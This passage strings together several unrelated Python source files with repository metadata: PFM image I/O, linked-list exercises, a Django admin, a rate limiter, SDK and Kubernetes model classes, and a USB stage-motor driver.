    avg_filter = tf.ones([9,9,3,1],dtype=tf.float32,name='avg_filter')
    # divide_weight counts how many in-bounds pixels each window covers,
    # so border averages are not biased by zero padding.
    divide_weight = tf.nn.convolution(ones,filter=avg_filter,padding='SAME')
    input_tensor_avg = tf.nn.convolution(input_tensor,filter=avg_filter,padding='SAME') / divide_weight
    #compute local std dev
    padded_left = tf.pad(input_tensor,[[0,0],[4,4],[4,4],[0,0]])
    padded_ones = tf.pad(ones,[[0,0],[4,4],[4,4],[0,0]])
    input_tensor_std = tf.zeros_like(input_tensor)
    # Accumulate squared deviations over every offset of the 9x9 window;
    # padded_ones masks out contributions from out-of-bounds pixels.
    for x in range(9):
        for y in range(9):
            input_tensor_std += tf.square(padded_left[:,y:y+full_h,x:x+full_w,:] - input_tensor_avg) * padded_ones[:,y:y+full_h,x:x+full_w,:]
    # Small epsilon keeps sqrt and the division below numerically safe.
    const = 1e-10
    input_tensor_std = tf.sqrt((input_tensor_std + const) / divide_weight)
    #Center input around mean
    input_tensor = (input_tensor - input_tensor_avg) / (input_tensor_std + const)
    return input_tensor
def readPFM(file):
    '''
    Read a PFM (Portable FloatMap) image from *file* (a path).

    This code is from https://lmb.informatik.uni-freiburg.de/resources/datasets/SceneFlowDatasets.en.html

    Returns a numpy float array; greyscale data has shape (height, width).
    NOTE(review): color data is reshaped to (1, height, width, 3), and
    np.flipud then flips the size-1 leading axis (a no-op) instead of the
    height axis — confirm this is the intended behaviour for color files.
    '''
    file = open(file, 'rb')

    color = None
    width = None
    height = None
    scale = None
    endian = None

    # Magic number: 'PF' = color (3 channels), 'Pf' = greyscale.
    header = file.readline().rstrip()
    if header.decode("ascii") == 'PF':
        color = True
    elif header.decode("ascii") == 'Pf':
        color = False
    else:
        raise Exception('Not a PFM file.')

    # Dimensions line: "<width> <height>".
    dim_match = re.match(r'^(\d+)\s(\d+)\s$', file.readline().decode("ascii"))
    if dim_match:
        width, height = list(map(int, dim_match.groups()))
    else:
        raise Exception('Malformed PFM header.')

    # Scale line: sign encodes byte order (negative = little-endian).
    scale = float(file.readline().decode("ascii").rstrip())
    if scale < 0: # little-endian
        endian = '<'
        scale = -scale
    else:
        endian = '>' # big-endian

    data = np.fromfile(file, endian + 'f')
    shape = (1,height, width, 3) if color else (height, width)

    data = np.reshape(data, shape)
    # PFM stores rows bottom-up; flip to top-down (see NOTE above for color).
    data = np.flipud(data)
    return data
def writePFM(file, image, scale=1):
    '''
    Write *image* (a float32 numpy array) to *file* (a path) in PFM format.

    Adapted from https://lmb.informatik.uni-freiburg.de/resources/datasets/SceneFlowDatasets.en.html

    Fixes over the original snippet:
    - the header line was only encoded on the greyscale branch because of
      operator precedence in the conditional expression, which raised
      TypeError when writing a color image to a binary file;
    - `sys` was referenced for the byte-order check but never imported;
    - the file handle is now closed, flushing buffered data to disk.

    Raises Exception when the dtype is not float32 or the shape is not
    H x W, H x W x 1, or H x W x 3.
    '''
    import sys  # needed for the native byte-order check below

    file = open(file, 'wb')

    color = None

    if image.dtype.name != 'float32':
        raise Exception('Image dtype must be float32.')

    # PFM stores rows bottom-up, so flip vertically before writing.
    image = np.flipud(image)

    if len(image.shape) == 3 and image.shape[2] == 3:  # color image
        color = True
    elif len(image.shape) == 2 or len(image.shape) == 3 and image.shape[2] == 1:  # greyscale
        color = False
    else:
        raise Exception('Image must have H x W x 3, H x W x 1 or H x W dimensions.')

    # Magic number, then "<width> <height>".
    file.write(('PF\n' if color else 'Pf\n').encode())
    file.write(('%d %d\n' % (image.shape[1], image.shape[0])).encode())

    # A negative scale signals little-endian float data.
    endian = image.dtype.byteorder
    if endian == '<' or endian == '=' and sys.byteorder == 'little':
        scale = -scale
    file.write(('%f\n' % scale).encode())

    image.tofile(file)
    file.close()
|
[
"noreply@github.com"
] |
huawei-noah.noreply@github.com
|
dfae7ec2e5295d75dd18efa6da46fbd208bce081
|
b8c4ef9ccab22717ab97ab2fb100614d962a5820
|
/src/main/python/com/skalicky/python/interviewpuzzles/merge_multiple_sorted_linked_lists.py
|
1ac1c3dc9ac3a02f3b3c233c860d355c4f9dda3f
|
[] |
no_license
|
Sandeep8447/interview_puzzles
|
1d6c8e05f106c8d5c4c412a9f304cb118fcc90f4
|
a3c1158fe70ed239f8548ace8d1443a431b644c8
|
refs/heads/master
| 2023-09-02T21:39:32.747747
| 2021-10-30T11:56:57
| 2021-10-30T11:56:57
| 422,867,683
| 0
| 0
| null | 2021-10-30T11:56:58
| 2021-10-30T11:55:17
| null |
UTF-8
|
Python
| false
| false
| 3,633
|
py
|
# Task:
#
# You are given an array of k sorted singly linked lists. Merge the linked lists into a single sorted linked list and
# return it.
#
# Here's your starting point:
#
# class Node(object):
# def __init__(self, val, next=None):
# self.val = val
# self.next = next
#
# def __str__(self):
# c = self
# answer = ""
# while c:
# answer += str(c.val) if c.val else ""
# c = c.next
# return answer
#
# def merge(lists):
# # Fill this in.
#
# a = Node(1, Node(3, Node(5)))
# b = Node(2, Node(4, Node(6)))
# print merge([a, b])
# # 123456
from typing import List, Optional
class Node:
    """Singly linked list node holding an int value."""

    def __init__(self, val: int, next_node=None):
        self.val: int = val
        self.next_node: Node = next_node

    def __str__(self):
        # Concatenate the values along the chain; falsy values (0, None)
        # contribute nothing, mirroring the original behaviour.
        parts = []
        node = self
        while node:
            if node.val:
                parts.append(str(node.val))
            node = node.next_node
        return "".join(parts)
def set_next_node_and_determine_beginning(beginning: Node, current: Node, next_node: Node):
    """Link *next_node* after *current* and report the resulting head.

    Returns a (head, tail) pair: when *current* is falsy the result list
    was empty, so *next_node* becomes both head and tail; otherwise the
    existing head is kept and *next_node* becomes the new tail.
    """
    if not current:
        return next_node, next_node
    current.next_node = next_node
    return beginning, next_node
def merge_two_lists(first: Node, second: Node):
    """Merge two sorted linked lists in place and return the merged head.

    Nodes from the inputs are relinked rather than copied; either input
    may be None. Head/tail bookkeeping is delegated to
    set_next_node_and_determine_beginning.
    """
    a = first
    b = second
    head: Optional[Node] = None
    tail: Optional[Node] = None

    # Consume both lists, always attaching the smaller front node.
    while a and b:
        if a.val <= b.val:
            head, tail = set_next_node_and_determine_beginning(head, tail, a)
            a = a.next_node
        else:
            head, tail = set_next_node_and_determine_beginning(head, tail, b)
            b = b.next_node

    # At most one input still has nodes; splice the whole remainder on.
    if b and not a:
        head, tail = set_next_node_and_determine_beginning(head, tail, b)
    if a and not b:
        head, tail = set_next_node_and_determine_beginning(head, tail, a)
    return head
def merge(lists: List[Node]):
    """Reduce a list of sorted linked lists to a single merged list.

    Repeatedly merges the last two entries (mutating *lists* in place)
    until one head remains. An empty input yields the empty string '',
    matching the original implementation.
    """
    if not lists:
        return ''
    remaining = lists
    while len(remaining) > 1:
        merged = merge_two_lists(remaining.pop(), remaining.pop())
        remaining.append(merged)
    return remaining[0]
# Demonstration runs; expected output shown after each print.
list1 = Node(1, Node(3, Node(5)))
list2 = Node(3, Node(4, Node(6, Node(7))))
list3 = Node(2, Node(8))
list4 = Node(9)
print(merge([list1, list2, list3, list4]))
# 1233456789
print(merge([]))
#
list5 = Node(1, Node(3, Node(5)))
print(merge([list5]))
# 135
# A None entry is tolerated: merge_two_lists treats it as an empty list.
list6 = Node(1, Node(3, Node(5)))
list7 = None
print(merge([list6, list7]))
# 135
|
[
"skalicky.tomas@gmail.com"
] |
skalicky.tomas@gmail.com
|
06a1015299b1742df49a3baa3691aa1c0bcdbb5f
|
71f3ecb8fc4666fcf9a98d39caaffc2bcf1e865c
|
/.history/第4章/lian1_20200608191011.py
|
322b31fe7018eb95ef28b4b5924a2532c3a1b951
|
[
"MIT"
] |
permissive
|
dltech-xyz/Alg_Py_Xiangjie
|
03a9cac9bdb062ce7a0d5b28803b49b8da69dcf3
|
877c0f8c75bf44ef524f858a582922e9ca39bbde
|
refs/heads/master
| 2022-10-15T02:30:21.696610
| 2020-06-10T02:35:36
| 2020-06-10T02:35:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,524
|
py
|
#!/usr/bin/env python
# coding=utf-8
'''
@version:
@Author: steven
@Date: 2020-05-27 22:20:22
@LastEditors: steven
@LastEditTime: 2020-06-08 19:10:11
@Description:
'''
class Node(object):
    """A singly linked list node.

    Attributes:
        data: the payload stored at this node.
        _next: reference to the following node, or None at the tail.

    (In Python 3 the explicit object base is implied; kept for
    compatibility with the original code.)
    """

    def __init__(self, data, pnext = None):
        self.data = data
        self._next = pnext

    def __repr__(self):
        """Render the node as its payload, so printing a node shows data."""
        return str(self.data)
class ChainTable(object):
    """A singly linked list with index-based access.

    Out-of-range or empty-table operations print an error message and
    return None instead of raising, preserving the original behaviour.
    Fix over the original: the "tabale" typo in insert()'s error message
    is corrected to "table".
    """

    def __init__(self):
        self.head = None      # first Node, or None when empty
        self.length = 0       # cached element count

    def isEmpty(self):
        """True when the table holds no nodes."""
        return (self.length == 0)

    def append(self, dataOrNode):
        """Append a value (wrapped in a Node) or an existing Node at the end."""
        item = None
        if isinstance(dataOrNode, Node):
            item = dataOrNode
        else:
            item = Node(dataOrNode)

        if not self.head:
            self.head = item
            self.length += 1
        else:
            # Walk to the current last node, then link the new item.
            node = self.head
            while node._next:
                node = node._next
            node._next = item
            self.length += 1

    def delete(self, index):
        """Remove the node at *index* (0-based); prints on invalid index."""
        if self.isEmpty():
            print("this chain table is empty.")
            return
        if index < 0 or index >= self.length:
            print('error: out of index')
            return
        if index == 0:
            self.head = self.head._next
            self.length -= 1
            return

        # Track the predecessor so it can be relinked past the target.
        j = 0
        node = self.head
        prev = self.head
        while node._next and j < index:
            prev = node
            node = node._next
            j += 1
        if j == index:
            prev._next = node._next
            self.length -= 1

    def insert(self, index, dataOrNode):
        """Insert a value or Node before position *index*.

        NOTE: as in the original, insertion into an empty table or at
        index == length (i.e. appending) is rejected — use append().
        """
        if self.isEmpty():
            print("this chain table is empty")
            return
        if index < 0 or index >= self.length:
            print("error: out of index")
            return

        item = None
        if isinstance(dataOrNode, Node):
            item = dataOrNode
        else:
            item = Node(dataOrNode)

        if index == 0:
            item._next = self.head
            self.head = item
            self.length += 1
            return

        j = 0
        node = self.head
        prev = self.head
        while node._next and j < index:
            prev = node
            node = node._next
            j += 1
        if j == index:
            item._next = node
            prev._next = item
            self.length += 1

    def update(self, index, data):
        """Replace the payload of the node at *index*."""
        if self.isEmpty() or index < 0 or index >= self.length:
            print('error: out of index')
            return
        j = 0
        node = self.head
        while node._next and j < index:
            node = node._next
            j += 1
        if j == index:
            node.data = data

    def getItem(self, index):
        """Return the payload at *index*, or None (with a message) if invalid."""
        if self.isEmpty() or index < 0 or index >= self.length:
            print("error: out of index")
            return
        j = 0
        node = self.head
        while node._next and j < index:
            node = node._next
            j += 1
        return node.data

    def getIndex(self, data):
        """Return the index of the first node holding *data*, else None."""
        j = 0
        if self.isEmpty():
            print("this chain table is empty")
            return
        node = self.head
        while node:
            if node.data == data:
                return j
            node = node._next
            j += 1
        if j == self.length:
            print("%s not found" % str(data))
            return

    def clear(self):
        """Drop every node; the old chain becomes garbage."""
        self.head = None
        self.length = 0

    def __repr__(self):
        # Space-separated payloads (with a trailing space), or a marker
        # string when empty — preserved from the original.
        if self.isEmpty():
            return("empty chain table")
        node = self.head
        nlist = ''
        while node:
            nlist += str(node.data) + ' '
            node = node._next
        return nlist

    def __getitem__(self, ind):
        if self.isEmpty() or ind < 0 or ind >= self.length:
            print("error: out of index")
            return
        return self.getItem(ind)

    def __setitem__(self, ind, val):
        if self.isEmpty() or ind < 0 or ind >= self.length:
            print("error: out of index")
            return
        self.update(ind, val)

    def __len__(self):
        return self.length
|
[
"a867907127@gmail.com"
] |
a867907127@gmail.com
|
bf726f5207709908e58489b515b521a76322c265
|
a5a33e7446e9af18be7861f8e5b44e33fcfed9e1
|
/users/admin.py
|
8d272c18906bd46236e726c597ce2eea308721c4
|
[] |
no_license
|
akabhi5/url-shortener-django-api
|
75afc14f167310a7a22429650a504da820627924
|
33a1fd3f52ce95b8d68ba706ce91cdfd95f95e53
|
refs/heads/main
| 2023-09-02T19:21:40.524613
| 2021-11-16T16:47:12
| 2021-11-16T16:47:12
| 380,212,386
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 911
|
py
|
# users/admin.py
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import Group
from django.contrib import admin
from users.forms import UserChangeForm, UserCreationForm
from users.models import User
class UserAdmin(BaseUserAdmin):
    """Admin configuration for the custom User model (email-based login)."""

    # Forms used by the admin to change and create users.
    form = UserChangeForm
    add_form = UserCreationForm

    # Change-list columns and sidebar filter.
    list_display = ('email', 'is_admin')
    list_filter = ('is_admin',)

    # Field layout on the change page.
    fieldsets = (
        (None, {'fields': ('email', 'password', 'first_name', 'last_name',)}),
        ('Permissions', {'fields': ('is_admin',)}),
    )
    # Field layout on the add-user page (password entered twice).
    add_fieldsets = (
        (None, {
            'classes': ('wide',),
            'fields': ('email', 'password1', 'password2'),
        }),
    )
    search_fields = ('email',)
    ordering = ('email',)
    filter_horizontal = ()

    class Meta:
        model = User
# Register the custom User admin; unregister Django's Group model.
# NOTE(review): presumably groups are unused in this project — confirm.
admin.site.register(User, UserAdmin)
admin.site.unregister(Group)
|
[
"abhishekk580@gmail.com"
] |
abhishekk580@gmail.com
|
e6172fd041838054a0760cdc1ac341bcfcf3bb15
|
bd1b1fda138e6687dadc57317c3e312bc8872600
|
/mycode/leetcode2017/Hash/359 Logger Rate Limiter.py
|
af15b46efce80851b00ad6e66769fec1c7c88d72
|
[] |
no_license
|
dundunmao/lint_leet
|
fc185038f57e0c5cbb82a74cebd4fe00422416cb
|
5788bd7b154649d2f787bbc4feb717ff2f4b4c59
|
refs/heads/master
| 2020-11-30T04:56:25.553327
| 2017-10-22T07:11:01
| 2017-10-22T07:11:01
| 96,705,212
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
# -*- encoding: utf-8 -*-
# Logger Rate Limiter 记录速率限制器
# 这道题让我们设计一个记录系统每次接受信息并保存时间戳,然后让我们打印出该消息,前提是最近10秒内没有打印出这个消息
# Example:
# Logger logger = new Logger();
#
# // logging string "foo" at timestamp 1
# logger.shouldPrintMessage(1, "foo"); returns true;
#
# // logging string "bar" at timestamp 2
# logger.shouldPrintMessage(2,"bar"); returns true;
#
# // logging string "foo" at timestamp 3
# logger.shouldPrintMessage(3,"foo"); returns false;
#
# // logging string "bar" at timestamp 8
# logger.shouldPrintMessage(8,"bar"); returns false;
#
# // logging string "foo" at timestamp 10
# logger.shouldPrintMessage(10,"foo"); returns false;
#
# // logging string "foo" at timestamp 11
# logger.shouldPrintMessage(11,"foo"); returns true;
class Logger():
    """Rate limiter allowing each message to print at most once per 10s
    (LeetCode 359, Logger Rate Limiter).
    """

    def __init__(self):
        # Maps message -> timestamp of the last time it was allowed.
        self.message = {}

    def shouldPrintMessage(self, time, str):
        """Return True if *str* may be printed at timestamp *time* (seconds).

        A message is printable when it has never been seen, or when at
        least 10 seconds elapsed since it was last printed. Fixes over
        the original:
        - dict.has_key() (Python 2 only) replaced with the `in` operator;
        - the comparison is now >= 10, so a message printed at t=1 is
          printable again at t=11, matching the documented example above;
        - the stored timestamp is refreshed whenever printing is allowed,
          so the 10-second window restarts from the latest print.
        """
        if str in self.message:
            if time - self.message[str] >= 10:
                self.message[str] = time
                return True
            return False
        self.message[str] = time
        return True
|
[
"dundunmao@gmail.com"
] |
dundunmao@gmail.com
|
0f87356dc8737967c17be6fb9a93469fbc84b1dc
|
e42a61b7be7ec3412e5cea0ffe9f6e9f34d4bf8d
|
/a10sdk/core/gslb/gslb_geoloc_rdt_oper.py
|
a354a4599bd1c8491c401a33f89f34e99d66ee21
|
[
"Apache-2.0"
] |
permissive
|
amwelch/a10sdk-python
|
4179565afdc76cdec3601c2715a79479b3225aef
|
3e6d88c65bd1a2bf63917d14be58d782e06814e6
|
refs/heads/master
| 2021-01-20T23:17:07.270210
| 2015-08-13T17:53:23
| 2015-08-13T17:53:23
| 40,673,499
| 0
| 0
| null | 2015-08-13T17:51:35
| 2015-08-13T17:51:34
| null |
UTF-8
|
Python
| false
| false
| 3,000
|
py
|
from a10sdk.common.A10BaseClass import A10BaseClass
class GeolocRdtList(A10BaseClass):

    """A single geoloc-rdt list entry (auto-generated SDK class).

    This class does not support CRUD Operations please use parent.

    Schema fields: rdt (number), site_name (string), gl_name (string),
    type (string), age (number).

    :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
    """

    def __init__(self, **kwargs):
        self.ERROR_MSG = ""
        self.b_key = "geoloc-rdt-list"
        self.DeviceProxy = ""
        self.rdt = ""
        self.site_name = ""
        self.gl_name = ""
        # NOTE(review): presumably the SDK's escaped attribute name for
        # the schema's "type" field ("type" shadows the builtin) —
        # confirm against A10BaseClass.
        self.A10WW_type = ""
        self.age = ""

        # Accept arbitrary schema fields supplied by the caller.
        for keys, value in kwargs.items():
            setattr(self,keys, value)
class Oper(A10BaseClass):

    """Operational-data container for geoloc-rdt (auto-generated SDK class).

    This class does not support CRUD Operations please use parent.

    Schema fields: geoloc_rdt_list (array of objects, see GeolocRdtList),
    geo_name (string), site_name (string), active_status (string),
    total_rdt (number).

    :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
    """

    def __init__(self, **kwargs):
        self.ERROR_MSG = ""
        self.b_key = "oper"
        self.DeviceProxy = ""
        self.geoloc_rdt_list = []
        self.geo_name = ""
        self.site_name = ""
        self.active_status = ""
        self.total_rdt = ""

        # Accept arbitrary schema fields supplied by the caller.
        for keys, value in kwargs.items():
            setattr(self,keys, value)
class GeolocRdt(A10BaseClass):

    """Class Description::

    Operational Status for the object geoloc-rdt.

    Class geoloc-rdt supports CRUD Operations and inherits from `common/A10BaseClass`.
    This class is the `"PARENT"` class for this module.`

    :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`

    URL for this object::

    `https://<Hostname|Ip address>//axapi/v3/gslb/geoloc-rdt/oper`.
    """

    def __init__(self, **kwargs):
        self.ERROR_MSG = ""
        self.required=[]
        self.b_key = "geoloc-rdt"
        # REST endpoint this object maps to on the device.
        self.a10_url="/axapi/v3/gslb/geoloc-rdt/oper"
        self.DeviceProxy = ""
        self.oper = {}

        # Accept arbitrary schema fields supplied by the caller.
        for keys, value in kwargs.items():
            setattr(self,keys, value)
|
[
"doug@parksidesoftware.com"
] |
doug@parksidesoftware.com
|
d21833248f0bdec9ce0f4b88c983939bacd74938
|
4f1fa59cc81dbaabf41c9e95108b643d00faceb9
|
/ros/actuation/stage/nodes/StageDevice.py
|
e2a4e44a9b722baa74204c36c0ee7ad2f637ad59
|
[] |
no_license
|
florisvb/Flyatar
|
7f31bb27108f6da785e67a2b92f56e7bc0beced0
|
dfaf30bcb77d6c95cab67ad280615722a11814c3
|
refs/heads/master
| 2021-01-01T15:44:54.827787
| 2010-06-24T01:24:06
| 2010-06-24T01:24:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,686
|
py
|
#!/usr/bin/env python
#
# StageDevice.py
#
# Control interface for at90usb based xyfly stage board.
# Provides python module and a command line utility.
#
# Note, need to set permissions correctly to get device to respond to nonroot
# users. This required adding and rules file to udev/rules.d and adding a
# group.
#
# who when what
# --- ---- ----
# pjp 08/19/09 version 1.0
# ---------------------------------------------------------------------------
from __future__ import division
import USBDevice
import ctypes
import time
# XYFly stage device parameters
_motor_num = 3
# Input/Output Structures
class MotorState_t(ctypes.LittleEndianStructure):
    # Per-motor state as carried in the USB packets: 16-bit step
    # frequency and 16-bit position, packed with no padding to match
    # the device's wire format.
    _pack_ = 1
    _fields_ =[('Frequency', ctypes.c_uint16),
               ('Position', ctypes.c_uint16)]
class USBPacketOut_t(ctypes.LittleEndianStructure):
    # Host -> device packet: MotorUpdate (presumably a per-motor bitmask;
    # set to 7 elsewhere for all three motors — confirm) plus one
    # set-point per motor.
    _pack_ = 1
    _fields_ =[('MotorUpdate', ctypes.c_uint8),
               ('SetPoint', MotorState_t * _motor_num)]
class USBPacketIn_t(ctypes.LittleEndianStructure):
    # Device -> host packet: the current state of every motor.
    _pack_ = 1
    _fields_ =[('MotorState', MotorState_t * _motor_num)]
class StageDevice(USBDevice.USB_Device):
def __init__(self, serial_number=None):
# USB device parameters
self.vendor_id = 0x0004
self.product_id = 0x0002
self.bulkout_ep_address = 0x01
self.bulkin_ep_address = 0x82
self.buffer_out_size = 64
self.buffer_in_size = 64
self.serial_number = serial_number
USBDevice.USB_Device.__init__(self,
self.vendor_id,
self.product_id,
self.bulkout_ep_address,
self.bulkin_ep_address,
self.buffer_out_size,
self.buffer_in_size,
self.serial_number)
# USB Command IDs
self.USB_CMD_GET_STATE = ctypes.c_uint8(1)
self.USB_CMD_SET_STATE = ctypes.c_uint8(2)
self.USBPacketOut = USBPacketOut_t()
self.USBPacketIn = USBPacketIn_t()
# self.Motor = []
# for MotorN in range(_motor_num):
# self.Motor.append({'Frequency' : 0,
# 'FrequencyMax' : FREQUENCY_MAX,
# 'Position' : 0,
# 'PositionMin' : POSITION_MIN,
# 'PositionMax' : POSITION_MAX,
# 'PositionSetPoint' : 0,
# 'Direction' : 0})
# Parameters
self.frequency_max = 30000
self.position_min = 0
self.position_max = 44000
self.steps_per_mm = 5000/25.4 # 5000 steps per inch
# 25.4 mm per inch
self.steps_per_radian = 200 # Change to actual number!
self.axis_x = 0
self.axis_y = 1
self.axis_theta = 2
self.x_vel_mm = 0
self.x_vel_steps = 0
self.y_vel_mm = 0
self.y_vel_steps = 0
self.x_pos_mm = 0
self.x_pos_steps = 0
self.y_pos_mm = 0
self.y_pos_steps = 0
def update_velocity(self, x_velocity, y_velocity):
self.x_vel_mm = x_velocity
self.y_vel_mm = y_velocity
self.x_vel_steps = self._mm_to_steps(self.x_vel_mm)
self.y_vel_steps = self._mm_to_steps(self.y_vel_mm)
if self.x_vel_steps < 0:
self.x_pos_steps = self.position_min
self.x_vel_steps = abs(self.x_vel_steps)
else:
self.x_pos_steps = self.position_max
if self.y_vel_steps < 0:
self.y_pos_steps = self.position_min
self.y_vel_steps = abs(self.y_vel_steps)
else:
self.y_pos_steps = self.position_max
if self.x_vel_steps > self.frequency_max:
self.x_vel_steps = self.frequency_max
if self.y_vel_steps > self.frequency_max:
self.y_vel_steps = self.frequency_max
self._set_frequency(self.axis_x,self.x_vel_steps)
self._set_position(self.axis_x,self.x_pos_steps)
self._set_frequency(self.axis_y,self.y_vel_steps)
self._set_position(self.axis_y,self.y_pos_steps)
self._set_motor_state()
x,y,theta,x_velocity,y_velocity,theta_velocity = self.return_state()
return x,y,theta,x_velocity,y_velocity,theta_velocity
def get_state(self):
self._get_motor_state()
x,y,theta,x_velocity,y_velocity,theta_velocity = self.return_state()
return x,y,theta,x_velocity,y_velocity,theta_velocity
def return_state(self):
x_velocity = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_x].Frequency)
x = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_x].Position)
y_velocity = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_y].Frequency)
y = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_y].Position)
theta_velocity = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_theta].Frequency)
theta = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_theta].Position)
return x,y,theta,x_velocity,y_velocity,theta_velocity
def _mm_to_steps(self,quantity_mm):
return quantity_mm*self.steps_per_mm
def _steps_to_mm(self,quantity_steps):
return quantity_steps/self.steps_per_mm
def _set_frequency(self,axis,freq):
self.USBPacketOut.SetPoint[axis].Frequency = int(freq)
def _set_position(self,axis,pos):
self.USBPacketOut.SetPoint[axis].Position = int(pos)
def _get_motor_state(self):
outdata = [self.USB_CMD_GET_STATE]
intypes = [ctypes.c_uint8, USBPacketIn_t]
val_list = self.usb_cmd(outdata,intypes)
cmd_id = val_list[0]
self._check_cmd_id(self.USB_CMD_GET_STATE,cmd_id)
self.USBPacketIn = val_list[1]
def _set_motor_state(self):
self.USBPacketOut.MotorUpdate = ctypes.c_uint8(7)
outdata = [self.USB_CMD_SET_STATE, self.USBPacketOut]
intypes = [ctypes.c_uint8, USBPacketIn_t]
val_list = self.usb_cmd(outdata,intypes)
cmd_id = val_list[0]
self._check_cmd_id(self.USB_CMD_SET_STATE,cmd_id)
self.USBPacketIn = val_list[1]
def _print_motor_state(self):
print '*'*20
print 'Frequency X = ', self.USBPacketIn.MotorState[self.axis_x].Frequency
print 'Position X = ', self.USBPacketIn.MotorState[self.axis_x].Position
print 'Frequency Y = ', self.USBPacketIn.MotorState[self.axis_y].Frequency
print 'Position Y = ', self.USBPacketIn.MotorState[self.axis_y].Position
print 'Frequency Theta = ', self.USBPacketIn.MotorState[self.axis_theta].Frequency
print 'Position Theta = ', self.USBPacketIn.MotorState[self.axis_theta].Position
print '*'*20
def _check_cmd_id(self,expected_id,received_id):
"""
Compares expected and received command ids.
Arguments:
expected_id = expected command id
received_is = received command id
Return: None
"""
if not expected_id.value == received_id.value:
msg = "received incorrect command ID %d expected %d"%(received_id.value,expected_id.value)
raise IOError, msg
return
#-------------------------------------------------------------------------------------
if __name__ == '__main__':
print "Opening XYFly stage device ..."
dev = StageDevice()
dev.print_values()
dev.close()
print "XYFly stage device closed."
|
[
"peterpolidoro@gmail.com"
] |
peterpolidoro@gmail.com
|
dea37d8cb8f20edbd9efe4496eee91c1a0e07810
|
d37f798101bc6cc795b3ff7e5f9444ff30b4cd83
|
/kubernetes/client/models/v1alpha2_pod_scheduling_context_status.py
|
6c66c9464423da9126cd1786a1a8d2b186fe4809
|
[
"Apache-2.0"
] |
permissive
|
MorningSong/python
|
bdd8b9d60b7c2185457fc1bbbc64d098f9682981
|
ae7b5ddd219fe09b6ed0be715dcca3377a029584
|
refs/heads/master
| 2023-08-30T14:41:41.582335
| 2023-08-23T16:15:28
| 2023-08-23T16:15:28
| 139,396,247
| 0
| 0
|
Apache-2.0
| 2023-09-14T00:11:24
| 2018-07-02T05:47:43
|
Python
|
UTF-8
|
Python
| false
| false
| 4,167
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.27
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1alpha2PodSchedulingContextStatus(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'resource_claims': 'list[V1alpha2ResourceClaimSchedulingStatus]'
}
attribute_map = {
'resource_claims': 'resourceClaims'
}
def __init__(self, resource_claims=None, local_vars_configuration=None): # noqa: E501
"""V1alpha2PodSchedulingContextStatus - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._resource_claims = None
self.discriminator = None
if resource_claims is not None:
self.resource_claims = resource_claims
@property
def resource_claims(self):
"""Gets the resource_claims of this V1alpha2PodSchedulingContextStatus. # noqa: E501
ResourceClaims describes resource availability for each pod.spec.resourceClaim entry where the corresponding ResourceClaim uses \"WaitForFirstConsumer\" allocation mode. # noqa: E501
:return: The resource_claims of this V1alpha2PodSchedulingContextStatus. # noqa: E501
:rtype: list[V1alpha2ResourceClaimSchedulingStatus]
"""
return self._resource_claims
@resource_claims.setter
def resource_claims(self, resource_claims):
"""Sets the resource_claims of this V1alpha2PodSchedulingContextStatus.
ResourceClaims describes resource availability for each pod.spec.resourceClaim entry where the corresponding ResourceClaim uses \"WaitForFirstConsumer\" allocation mode. # noqa: E501
:param resource_claims: The resource_claims of this V1alpha2PodSchedulingContextStatus. # noqa: E501
:type: list[V1alpha2ResourceClaimSchedulingStatus]
"""
self._resource_claims = resource_claims
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha2PodSchedulingContextStatus):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1alpha2PodSchedulingContextStatus):
return True
return self.to_dict() != other.to_dict()
|
[
"yliao@google.com"
] |
yliao@google.com
|
8d44940c93f41db2928de8cf2a87441142228f87
|
2970291ff52e98915abb47848aeb71517ed1fbab
|
/Calendar/migrations/0022_auto_20200405_1326.py
|
bd6f6fb6f31742fecf4543426da49ea7cd50f696
|
[] |
no_license
|
dannyswolf/MLShop_Django_Service_boook
|
dd33f4bb0352836897448bc45bbb09b7c49252c2
|
9ac5f85468487a53465e244ba31b9bc968300783
|
refs/heads/master
| 2023-07-15T15:06:53.298042
| 2021-08-29T11:49:42
| 2021-08-29T11:49:42
| 255,998,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
# Generated by Django 3.0.4 on 2020-04-05 13:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
